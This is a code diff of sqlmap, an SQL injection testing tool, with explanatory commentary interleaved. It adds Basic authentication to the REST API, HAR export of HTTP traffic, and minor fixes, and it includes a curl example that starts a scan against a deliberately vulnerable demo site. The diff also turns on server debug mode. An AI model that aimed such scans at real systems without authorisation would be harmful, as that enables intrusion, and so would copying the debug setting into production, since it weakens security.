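In plain terms, the rewritten write() keeps at most one growing row per (taskid, content_type) while output is still in progress and replaces the partial rows with a single final row once the status is COMPLETE. A self-contained sketch of that flow against an in-memory SQLite table (the schema and the numeric status constants are assumptions for illustration, not sqlmap's CONTENT_STATUS values):

```python
import json
import sqlite3

IN_PROGRESS, COMPLETE = 0, 1   # illustrative stand-ins for CONTENT_STATUS

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid TEXT, status INTEGER, content_type INTEGER, value TEXT)")

def write(taskid, value, status, content_type=0):
    rows = db.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (taskid, content_type)).fetchall()

    if status == COMPLETE:
        # a complete result supersedes any partial chunks stored so far
        for row in rows:
            db.execute("DELETE FROM data WHERE id = ?", (row[0],))
        db.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (taskid, status, content_type, json.dumps(value)))
    elif status == IN_PROGRESS:
        if not rows:
            db.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (taskid, status, content_type, json.dumps(value)))
        else:
            # append the new chunk to the existing partial value
            new_value = "%s%s" % (json.loads(rows[0][2]), value)
            db.execute("UPDATE data SET value = ? WHERE id = ?", (json.dumps(new_value), rows[0][0]))

write("abc123", "partial ", IN_PROGRESS)
write("abc123", "output", IN_PROGRESS)
write("abc123", "final output", COMPLETE)
print(db.execute("SELECT status, value FROM data WHERE taskid = 'abc123'").fetchall())   # a single COMPLETE row
```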
@@ -270,17 +263,13 @@ class StdDbOut(object):
|
||||
def seek(self):
|
||||
pass
|
||||
|
||||
|
||||
class LogRecorder(logging.StreamHandler):
|
||||
def emit(self, record):
|
||||
"""
|
||||
Record emitted events to IPC database for asynchronous I/O
|
||||
communication with the parent process
|
||||
"""
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
(conf.taskid, time.strftime("%X"), record.levelname,
|
||||
record.msg % record.args if record.args else record.msg))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg))
|
||||
|
||||
def setRestAPILog():
|
||||
if conf.api:
|
||||
@@ -295,11 +284,32 @@ def setRestAPILog():
|
||||
LOGGER_RECORDER = LogRecorder()
|
||||
logger.addHandler(LOGGER_RECORDER)
|
||||
|
||||
|
||||
# Generic functions
|
||||
def is_admin(taskid):
|
||||
return DataStore.admin_id == taskid
|
||||
|
||||
@hook('before_request')
|
||||
def check_authentication():
|
||||
if not any((DataStore.username, DataStore.password)):
|
||||
return
|
||||
|
||||
authorization = request.headers.get("Authorization", "")
|
||||
match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization)
|
||||
|
||||
if not match:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
|
||||
try:
|
||||
creds = match.group(1).decode("base64")
|
||||
except:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
else:
|
||||
if creds.count(':') != 1:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
else:
|
||||
username, password = creds.split(':')
|
||||
if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""):
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
|
||||
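The new check_authentication() hook only lets a request through when its Authorization header carries base64-encoded `username:password` credentials matching DataStore.username and DataStore.password. A short sketch of building such a header on the client side and validating it the way the hook does (sample credentials are made up; `base64.b64encode`/`b64decode` stand in for the diff's Python 2 `"base64"` codec calls):

```python
import base64
import re

username, password = "admin", "s3cret"   # made-up sample credentials

# client side: the header a caller would have to send
authorization = "Basic %s" % base64.b64encode("%s:%s" % (username, password)).strip()

# server side: roughly the checks performed by check_authentication()
allowed = False
match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization)
if match:
    try:
        creds = base64.b64decode(match.group(1))
    except Exception:
        creds = ""
    if creds.count(":") == 1:
        user, pwd = creds.split(":")
        allowed = user.strip() == username and pwd.strip() == password

print(allowed)   # True
```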
@hook("after_request")
|
||||
def security_headers(json_header=True):
|
||||
@@ -313,6 +323,7 @@ def security_headers(json_header=True):
|
||||
response.headers["Pragma"] = "no-cache"
|
||||
response.headers["Cache-Control"] = "no-cache"
|
||||
response.headers["Expires"] = "0"
|
||||
|
||||
if json_header:
|
||||
response.content_type = "application/json; charset=UTF-8"
|
||||
|
||||
@@ -320,35 +331,39 @@ def security_headers(json_header=True):
|
||||
# HTTP Status Code functions #
|
||||
##############################
|
||||
|
||||
|
||||
@return_error(401) # Access Denied
|
||||
def error401(error=None):
|
||||
security_headers(False)
|
||||
return "Access denied"
|
||||
|
||||
|
||||
@return_error(404) # Not Found
|
||||
def error404(error=None):
|
||||
security_headers(False)
|
||||
return "Nothing here"
|
||||
|
||||
|
||||
@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET)
|
||||
def error405(error=None):
|
||||
security_headers(False)
|
||||
return "Method not allowed"
|
||||
|
||||
|
||||
@return_error(500) # Internal Server Error
|
||||
def error500(error=None):
|
||||
security_headers(False)
|
||||
return "Internal server error"
|
||||
|
||||
#############
|
||||
# Auxiliary #
|
||||
#############
|
||||
|
||||
@get('/error/401')
|
||||
def path_401():
|
||||
response.status = 401
|
||||
return response
|
||||
|
||||
#############################
|
||||
# Task management functions #
|
||||
#############################
|
||||
|
||||
|
||||
# Users' methods
|
||||
@get("/task/new")
|
||||
def task_new():
|
||||
@@ -363,7 +378,6 @@ def task_new():
|
||||
logger.debug("Created new task: '%s'" % taskid)
|
||||
return jsonize({"success": True, "taskid": taskid})
|
||||
|
||||
|
||||
@get("/task/<taskid>/delete")
|
||||
def task_delete(taskid):
|
||||
"""
|
||||
@@ -382,7 +396,6 @@ def task_delete(taskid):
|
||||
# Admin functions #
|
||||
###################
|
||||
|
||||
|
||||
@get("/admin/<taskid>/list")
|
||||
def task_list(taskid=None):
|
||||
"""
|
||||
@@ -415,7 +428,6 @@ def task_flush(taskid):
|
||||
# sqlmap core interact functions #
|
||||
##################################
|
||||
|
||||
|
||||
# Handle task's options
|
||||
@get("/option/<taskid>/list")
|
||||
def option_list(taskid):
|
||||
@@ -429,7 +441,6 @@ def option_list(taskid):
|
||||
logger.debug("[%s] Listed task options" % taskid)
|
||||
return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()})
|
||||
|
||||
|
||||
@post("/option/<taskid>/get")
|
||||
def option_get(taskid):
|
||||
"""
|
||||
@@ -448,33 +459,41 @@ def option_get(taskid):
|
||||
logger.debug("[%s] Requested value for unknown option %s" % (taskid, option))
|
||||
return jsonize({"success": False, "message": "Unknown option", option: "not set"})
|
||||
|
||||
|
||||
@post("/option/<taskid>/set")
|
||||
def option_set(taskid):
|
||||
"""
|
||||
Set an option (command line switch) for a certain task ID
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to option_set()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
if request.json is None:
|
||||
logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid JSON options"})
|
||||
|
||||
for option, value in request.json.items():
|
||||
DataStore.tasks[taskid].set_option(option, value)
|
||||
|
||||
logger.debug("[%s] Requested to set options" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
# Handle scans
|
||||
@post("/scan/<taskid>/start")
|
||||
def scan_start(taskid):
|
||||
"""
|
||||
Launch a scan
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
if request.json is None:
|
||||
logger.warning("[%s] Invalid JSON options provided to scan_start()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid JSON options"})
|
||||
|
||||
# Initialize sqlmap engine's options with user's provided options, if any
|
||||
for option, value in request.json.items():
|
||||
DataStore.tasks[taskid].set_option(option, value)
|
||||
@@ -485,12 +504,12 @@ def scan_start(taskid):
|
||||
logger.debug("[%s] Started scan" % taskid)
|
||||
return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()})
|
||||
|
||||
|
||||
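Driving these endpoints from code follows the same order as the curl examples further down in this file: create a task, optionally set options, POST the scan options as JSON to /scan/&lt;taskid&gt;/start and then poll /scan/&lt;taskid&gt;/status. A rough urllib2-based client sketch (Python 2 style to match the diff; the server address and target URL are placeholders):

```python
import json
import urllib2

server = "http://127.0.0.1:8775"   # placeholder REST-JSON API address

def call(path, options=None):
    data = json.dumps(options) if options is not None else None
    request = urllib2.Request(server + path, data, {"Content-Type": "application/json"})
    return json.loads(urllib2.urlopen(request).read())

taskid = call("/task/new")["taskid"]                   # create a new task
call("/option/%s/set" % taskid, {"level": 1})          # optionally preset options
call("/scan/%s/start" % taskid, {"url": "http://testphp.vulnweb.com/artists.php?artist=1"})
print(call("/scan/%s/status" % taskid))                # poll until "terminated", then fetch /scan/<taskid>/data
```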
@get("/scan/<taskid>/stop")
|
||||
def scan_stop(taskid):
|
||||
"""
|
||||
Stop a scan
|
||||
"""
|
||||
|
||||
if (taskid not in DataStore.tasks or
|
||||
DataStore.tasks[taskid].engine_process() is None or
|
||||
DataStore.tasks[taskid].engine_has_terminated()):
|
||||
@@ -502,12 +521,12 @@ def scan_stop(taskid):
|
||||
logger.debug("[%s] Stopped scan" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/kill")
|
||||
def scan_kill(taskid):
|
||||
"""
|
||||
Kill a scan
|
||||
"""
|
||||
|
||||
if (taskid not in DataStore.tasks or
|
||||
DataStore.tasks[taskid].engine_process() is None or
|
||||
DataStore.tasks[taskid].engine_has_terminated()):
|
||||
@@ -519,12 +538,12 @@ def scan_kill(taskid):
|
||||
logger.debug("[%s] Killed scan" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/status")
|
||||
def scan_status(taskid):
|
||||
"""
|
||||
Returns status of a scan
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
@@ -541,12 +560,12 @@ def scan_status(taskid):
|
||||
"returncode": DataStore.tasks[taskid].engine_get_returncode()
|
||||
})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/data")
|
||||
def scan_data(taskid):
|
||||
"""
|
||||
Retrieve the data of a scan
|
||||
"""
|
||||
|
||||
json_data_message = list()
|
||||
json_errors_message = list()
|
||||
|
||||
@@ -555,16 +574,11 @@ def scan_data(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all data from the IPC database for the taskid
|
||||
for status, content_type, value in DataStore.current_db.execute(
|
||||
"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
json_data_message.append(
|
||||
{"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
|
||||
# Read all error messages from the IPC database
|
||||
for error in DataStore.current_db.execute(
|
||||
"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_errors_message.append(error)
|
||||
|
||||
logger.debug("[%s] Retrieved scan data and error messages" % taskid)
|
||||
@@ -577,6 +591,7 @@ def scan_log_limited(taskid, start, end):
|
||||
"""
|
||||
Retrieve a subset of log messages
|
||||
"""
|
||||
|
||||
json_log_messages = list()
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
@@ -591,10 +606,7 @@ def scan_log_limited(taskid, start, end):
|
||||
end = max(1, int(end))
|
||||
|
||||
# Read a subset of log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
("SELECT time, level, message FROM logs WHERE "
|
||||
"taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"),
|
||||
(taskid, start, end)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages subset" % taskid)
|
||||
@@ -606,6 +618,7 @@ def scan_log(taskid):
|
||||
"""
|
||||
Retrieve the log messages
|
||||
"""
|
||||
|
||||
json_log_messages = list()
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
@@ -613,8 +626,7 @@ def scan_log(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
"SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages" % taskid)
|
||||
@@ -627,6 +639,7 @@ def download(taskid, target, filename):
|
||||
"""
|
||||
Download a certain file from the file system
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to download()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
@@ -647,13 +660,17 @@ def download(taskid, target, filename):
|
||||
return jsonize({"success": False, "message": "File does not exist"})
|
||||
|
||||
|
||||
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER):
|
||||
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None):
|
||||
"""
|
||||
REST-JSON API server
|
||||
"""
|
||||
|
||||
DataStore.admin_id = hexencode(os.urandom(16))
|
||||
handle, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
|
||||
os.close(handle)
|
||||
DataStore.username = username
|
||||
DataStore.password = password
|
||||
|
||||
_, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
|
||||
os.close(_)
|
||||
|
||||
if port == 0: # random
|
||||
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
|
||||
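When `port == 0` the server is meant to pick a free port; the body of that `with` block is not shown in the hunk, but the usual pattern is to bind a throwaway socket to port 0 and read back whatever port the OS assigned. A small standalone sketch of that technique (an assumption about the elided lines, not a quote of them):

```python
import contextlib
import socket

# Bind to port 0 so the operating system assigns any free port,
# then reuse that number for the real server.
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]

print(port)   # some free ephemeral port, e.g. 49213
```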
@@ -681,7 +698,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
|
||||
import eventlet
|
||||
eventlet.monkey_patch()
|
||||
logger.debug("Using adapter '%s' to run bottle" % adapter)
|
||||
run(host=host, port=port, quiet=True, debug=False, server=adapter)
|
||||
run(host=host, port=port, quiet=True, debug=True, server=adapter)
|
||||
except socket.error, ex:
|
||||
if "already in use" in getSafeExString(ex):
|
||||
logger.error("Address already in use ('%s:%s')" % (host, port))
|
||||
@@ -702,7 +719,12 @@ def _client(url, options=None):
|
||||
data = None
|
||||
if options is not None:
|
||||
data = jsonize(options)
|
||||
req = urllib2.Request(url, data, {"Content-Type": "application/json"})
|
||||
headers = {"Content-Type": "application/json"}
|
||||
|
||||
if DataStore.username or DataStore.password:
|
||||
headers["Authorization"] = "Basic %s" % ("%s:%s" % (DataStore.username or "", DataStore.password or "")).encode("base64").strip()
|
||||
|
||||
req = urllib2.Request(url, data, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
text = response.read()
|
||||
except:
|
||||
@@ -711,12 +733,14 @@ def _client(url, options=None):
|
||||
raise
|
||||
return text
|
||||
|
||||
|
||||
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None):
|
||||
"""
|
||||
REST-JSON API client
|
||||
"""
|
||||
|
||||
DataStore.username = username
|
||||
DataStore.password = password
|
||||
|
||||
dbgMsg = "Example client access from command line:"
|
||||
dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
|
||||
dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port)
|
||||
@@ -730,7 +754,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
try:
|
||||
_client(addr)
|
||||
except Exception, ex:
|
||||
if not isinstance(ex, urllib2.HTTPError):
|
||||
if not isinstance(ex, urllib2.HTTPError) or ex.code == httplib.UNAUTHORIZED:
|
||||
errMsg = "There has been a problem while connecting to the "
|
||||
errMsg += "REST-JSON API server at '%s' " % addr
|
||||
errMsg += "(%s)" % ex
|
||||
@@ -757,7 +781,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
if not res["success"]:
|
||||
logger.error("Failed to execute command %s" % command)
|
||||
dataToStdout("%s\n" % raw)
|
||||
|
||||
|
||||
elif command.startswith("option"):
|
||||
if not taskid:
|
||||
logger.error("No task ID in use")
|
||||
|
||||
@@ -112,10 +112,10 @@ def crawl(target):
|
||||
threadData.shared.deeper.add(url)
|
||||
if re.search(r"(.*?)\?(.+)", url):
|
||||
threadData.shared.value.add(url)
|
||||
except ValueError: # for non-valid links
|
||||
pass
|
||||
except UnicodeEncodeError: # for non-HTML files
|
||||
pass
|
||||
except ValueError: # for non-valid links
|
||||
pass
|
||||
finally:
|
||||
if conf.forms:
|
||||
findPageForms(content, current, False, True)
|
||||
|
||||
229
lib/utils/har.py
Normal file
@@ -0,0 +1,229 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import base64
|
||||
import BaseHTTPServer
|
||||
import datetime
|
||||
import httplib
|
||||
import re
|
||||
import StringIO
|
||||
import time
|
||||
|
||||
from lib.core.bigarray import BigArray
|
||||
from lib.core.settings import VERSION
|
||||
|
||||
# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html
|
||||
# http://www.softwareishard.com/har/viewer/
|
||||
|
||||
class HTTPCollectorFactory:
|
||||
def __init__(self, harFile=False):
|
||||
self.harFile = harFile
|
||||
|
||||
def create(self):
|
||||
return HTTPCollector()
|
||||
|
||||
class HTTPCollector:
|
||||
def __init__(self):
|
||||
self.messages = BigArray()
|
||||
self.extendedArguments = {}
|
||||
|
||||
def setExtendedArguments(self, arguments):
|
||||
self.extendedArguments = arguments
|
||||
|
||||
def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None):
|
||||
self.messages.append(RawPair(requestMessage, responseMessage,
|
||||
startTime=startTime, endTime=endTime,
|
||||
extendedArguments=self.extendedArguments))
|
||||
|
||||
def obtain(self):
|
||||
return {"log": {
|
||||
"version": "1.2",
|
||||
"creator": {"name": "sqlmap", "version": VERSION},
|
||||
"entries": [pair.toEntry().toDict() for pair in self.messages],
|
||||
}}
|
||||
|
||||
class RawPair:
|
||||
def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None):
|
||||
self.request = request
|
||||
self.response = response
|
||||
self.startTime = startTime
|
||||
self.endTime = endTime
|
||||
self.extendedArguments = extendedArguments or {}
|
||||
|
||||
def toEntry(self):
|
||||
return Entry(request=Request.parse(self.request), response=Response.parse(self.response),
|
||||
startTime=self.startTime, endTime=self.endTime,
|
||||
extendedArguments=self.extendedArguments)
|
||||
|
||||
class Entry:
|
||||
def __init__(self, request, response, startTime, endTime, extendedArguments):
|
||||
self.request = request
|
||||
self.response = response
|
||||
self.startTime = startTime or 0
|
||||
self.endTime = endTime or 0
|
||||
self.extendedArguments = extendedArguments
|
||||
|
||||
def toDict(self):
|
||||
out = {
|
||||
"request": self.request.toDict(),
|
||||
"response": self.response.toDict(),
|
||||
"cache": {},
|
||||
"timings": {
|
||||
"send": -1,
|
||||
"wait": -1,
|
||||
"receive": -1,
|
||||
},
|
||||
"time": int(1000 * (self.endTime - self.startTime)),
|
||||
"startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None
|
||||
}
|
||||
out.update(self.extendedArguments)
|
||||
return out
|
||||
|
||||
class Request:
|
||||
def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None):
|
||||
self.method = method
|
||||
self.path = path
|
||||
self.httpVersion = httpVersion
|
||||
self.headers = headers or {}
|
||||
self.postBody = postBody
|
||||
self.comment = comment.strip() if comment else comment
|
||||
self.raw = raw
|
||||
|
||||
@classmethod
|
||||
def parse(cls, raw):
|
||||
request = HTTPRequest(raw)
|
||||
return cls(method=request.command,
|
||||
path=request.path,
|
||||
httpVersion=request.request_version,
|
||||
headers=request.headers,
|
||||
postBody=request.rfile.read(),
|
||||
comment=request.comment,
|
||||
raw=raw)
|
||||
|
||||
@property
|
||||
def url(self):
|
||||
host = self.headers.get("Host", "unknown")
|
||||
return "http://%s%s" % (host, self.path)
|
||||
|
||||
def toDict(self):
|
||||
out = {
|
||||
"httpVersion": self.httpVersion,
|
||||
"method": self.method,
|
||||
"url": self.url,
|
||||
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()],
|
||||
"cookies": [],
|
||||
"queryString": [],
|
||||
"headersSize": -1,
|
||||
"bodySize": -1,
|
||||
"comment": self.comment,
|
||||
}
|
||||
|
||||
if self.postBody:
|
||||
contentType = self.headers.get("Content-Type")
|
||||
out["postData"] = {
|
||||
"mimeType": contentType,
|
||||
"text": self.postBody.rstrip("\r\n"),
|
||||
}
|
||||
|
||||
return out
|
||||
|
||||
class Response:
|
||||
extract_status = re.compile(r'\((\d{3}) (.*)\)')
|
||||
|
||||
def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None):
|
||||
self.raw = raw
|
||||
self.httpVersion = httpVersion
|
||||
self.status = status
|
||||
self.statusText = statusText
|
||||
self.headers = headers
|
||||
self.content = content
|
||||
self.comment = comment.strip() if comment else comment
|
||||
|
||||
@classmethod
|
||||
def parse(cls, raw):
|
||||
altered = raw
|
||||
comment = ""
|
||||
|
||||
if altered.startswith("HTTP response [") or altered.startswith("HTTP redirect ["):
|
||||
io = StringIO.StringIO(raw)
|
||||
first_line = io.readline()
|
||||
parts = cls.extract_status.search(first_line)
|
||||
status_line = "HTTP/1.0 %s %s" % (parts.group(1), parts.group(2))
|
||||
remain = io.read()
|
||||
altered = status_line + "\r\n" + remain
|
||||
comment = first_line
|
||||
|
||||
response = httplib.HTTPResponse(FakeSocket(altered))
|
||||
response.begin()
|
||||
|
||||
try:
|
||||
content = response.read(-1)
|
||||
except httplib.IncompleteRead:
|
||||
content = raw[raw.find("\r\n\r\n") + 4:].rstrip("\r\n")
|
||||
|
||||
return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0",
|
||||
status=response.status,
|
||||
statusText=response.reason,
|
||||
headers=response.msg,
|
||||
content=content,
|
||||
comment=comment,
|
||||
raw=raw)
|
||||
|
||||
def toDict(self):
|
||||
content = {
|
||||
"mimeType": self.headers.get("Content-Type"),
|
||||
"text": self.content,
|
||||
"size": len(self.content or "")
|
||||
}
|
||||
|
||||
binary = set(['\0', '\1'])
|
||||
if any(c in binary for c in self.content):
|
||||
content["encoding"] = "base64"
|
||||
content["text"] = base64.b64encode(self.content)
|
||||
|
||||
return {
|
||||
"httpVersion": self.httpVersion,
|
||||
"status": self.status,
|
||||
"statusText": self.statusText,
|
||||
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"],
|
||||
"cookies": [],
|
||||
"content": content,
|
||||
"headersSize": -1,
|
||||
"bodySize": -1,
|
||||
"redirectURL": "",
|
||||
"comment": self.comment,
|
||||
}
|
||||
|
||||
class FakeSocket:
|
||||
# Original source:
|
||||
# https://stackoverflow.com/questions/24728088/python-parse-http-response-string
|
||||
|
||||
def __init__(self, response_text):
|
||||
self._file = StringIO.StringIO(response_text)
|
||||
|
||||
def makefile(self, *args, **kwargs):
|
||||
return self._file
|
||||
|
||||
class HTTPRequest(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||
# Original source:
|
||||
# https://stackoverflow.com/questions/4685217/parse-raw-http-headers
|
||||
|
||||
def __init__(self, request_text):
|
||||
self.comment = None
|
||||
self.rfile = StringIO.StringIO(request_text)
|
||||
self.raw_requestline = self.rfile.readline()
|
||||
|
||||
if self.raw_requestline.startswith("HTTP request ["):
|
||||
self.comment = self.raw_requestline
|
||||
self.raw_requestline = self.rfile.readline()
|
||||
|
||||
self.error_code = self.error_message = None
|
||||
self.parse_request()
|
||||
|
||||
def send_error(self, code, message):
|
||||
self.error_code = code
|
||||
self.error_message = message
|
||||
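Taken together, the new lib/utils/har.py turns raw request/response strings into HAR 1.2 entries, and sqlmap.py (further down) dumps `conf.httpCollector.obtain()` to the requested HAR file with `json.dump`. A rough usage sketch, assuming the module is importable as `lib.utils.har` and is fed hand-written raw messages:

```python
import json

from lib.utils.har import HTTPCollector   # assumes sqlmap's root directory is on sys.path

raw_request = (
    "GET /artists.php?artist=1 HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "\r\n"
)
raw_response = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
    "hello"
)

collector = HTTPCollector()
collector.collectRequest(raw_request, raw_response, startTime=0, endTime=0.5)

# Same structure that sqlmap.py serializes when a HAR file is requested
print(json.dumps(collector.obtain(), indent=4))
```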
@@ -64,6 +64,8 @@ class SQLAlchemy(GenericConnector):
|
||||
raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__)
|
||||
except ImportError:
|
||||
pass
|
||||
elif "invalid literal for int() with base 10: '0b" in traceback.format_exc():
|
||||
raise SqlmapConnectionException("SQLAlchemy connection issue ('https://bitbucket.org/zzzeek/sqlalchemy/issues/3975')")
|
||||
raise
|
||||
except SqlmapFilePathException:
|
||||
raise
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import pyodbc
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import ibm_db_dbi
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import kinterbasdb
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import jaydebeapi
|
||||
import jpype
|
||||
except ImportError, msg:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import ibm_db_dbi
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -226,12 +226,10 @@ class Enumeration(GenericEnumeration):
|
||||
|
||||
return {}
|
||||
|
||||
def searchDb(self):
|
||||
warnMsg = "on SAP MaxDB it is not possible to search databases"
|
||||
def search(self):
|
||||
warnMsg = "on SAP MaxDB search option is not available"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getHostname(self):
|
||||
warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import _mssql
|
||||
import pymssql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -46,7 +46,7 @@ class Filesystem(GenericFilesystem):
|
||||
scrString = ""
|
||||
|
||||
for lineChar in fileContent[fileLine:fileLine + lineLen]:
|
||||
strLineChar = hexencode(lineChar)
|
||||
strLineChar = hexencode(lineChar, conf.encoding)
|
||||
|
||||
if not scrString:
|
||||
scrString = "e %x %s" % (lineAddr, strLineChar)
|
||||
|
||||
@@ -82,7 +82,7 @@ class Fingerprint(GenericFingerprint):
|
||||
if conf.direct:
|
||||
result = True
|
||||
else:
|
||||
